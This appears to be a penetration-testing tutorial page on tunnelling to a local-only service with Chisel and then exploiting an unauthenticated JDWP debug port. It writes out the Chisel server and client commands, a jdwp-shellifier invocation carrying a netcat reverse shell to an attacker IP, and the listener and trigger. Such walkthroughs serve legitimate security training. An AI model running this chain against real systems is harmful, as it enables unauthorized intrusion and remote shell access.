Zero Day Archives
Chisel Port Forwarding


Last updated 2 months ago

Port Forwarding with Chisel

When performing internal network enumeration, it's crucial to identify services that are listening on the compromised host but are not reachable from outside it. In this case, we discovered a service on port 8000 that is only reachable locally, using the ss command:

ss -ntplu

This lists every listening TCP and UDP socket (-t, -u, -l) in numeric form (-n) together with the owning process (-p), which is what lets us pinpoint the internal service. A service that only answers on the host itself needs a tunnel before we can reach it from our attack machine.

Setting Up a Port Forward with Chisel

To access the internal service remotely, we can set up a port forward using Chisel, a TCP/UDP tunnel transported over HTTP and secured with SSH that also supports reverse port forwarding. Reverse forwarding lets the target push its local port 8000 back to our attack machine even when we cannot open an inbound connection to the target ourselves.

Step 1: Start the Chisel Server on the Attacker Machine

On our attacking machine, we start a Chisel server listening on port 9000. The --reverse flag is required: without it the server refuses any R: remote a client asks for:

chisel server -p 9000 --reverse

Step 2: Start the Chisel Client on the Target Machine

On the target machine, we run the Chisel client so that it connects back to our server and requests a reverse remote. The remote is written local-port:remote-host:remote-port from the server's point of view, so R:8000:127.0.0.1:8000 tells the server to listen on its own port 8000 and forward whatever arrives there to 127.0.0.1:8000 on the client. --max-retry-count 1 makes the client give up after one failed reconnect instead of retrying forever:

./chisel client --max-retry-count 1 192.168.45.241:9000 R:8000:127.0.0.1:8000

Because the local interface of a remote defaults to 0.0.0.0, this listener is open on every interface of the attack machine; write the interface explicitly (R:127.0.0.1:8000:127.0.0.1:8000) when it should only be reachable from localhost. Once the tunnel is up, the target's internal port 8000 is reachable at 127.0.0.1:8000 on our system.

Using the Port Forward for Exploitation

Now that port 8000 is reachable as 127.0.0.1:8000 on our attacking machine, we can point exploitation tooling at it. For example, if the service on port 8000 is a Java Debug Wire Protocol (JDWP) listener (a JVM started with -agentlib:jdwp=transport=dt_socket,address=8000 or similar), anyone who completes the handshake can attach: JDWP has no authentication. jdwp-shellifier.py attaches through the tunnel and arranges for an OS command to run inside the JVM via Runtime.exec(); here the command is a busybox netcat reverse shell back to our machine on port 2222. The tool is written for Python 2, hence python2:

python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "busybox nc 192.168.45.241 2222 -e /bin/bash"

Runtime.exec() splits the command on whitespace itself rather than handing it to a shell, so pipes and redirects are not available; a single binary with its arguments, as above, is the safe form.

Step 3: Set Up a Listener for the Reverse Shell

Before triggering the exploit, we set up a netcat listener on our attack machine to catch the reverse shell. The port must match the one in the command passed to jdwp-shellifier:

nc -nvlp 2222

Step 4: Trigger the Reverse Shell on the Target

jdwp-shellifier does not run the command the moment it attaches: by default it sets a breakpoint on java.net.ServerSocket.accept and executes the command when that breakpoint fires. The port below is assumed to be one the debugged Java application accepts connections on (5000 here), so any TCP connection to it, made from our existing foothold on the target in this case, trips the breakpoint:

nc 127.0.0.1 5000

Once the breakpoint fires, the command runs inside the JVM with the JVM's privileges and the reverse shell lands on our listener, allowing further exploitation and post-exploitation activities.
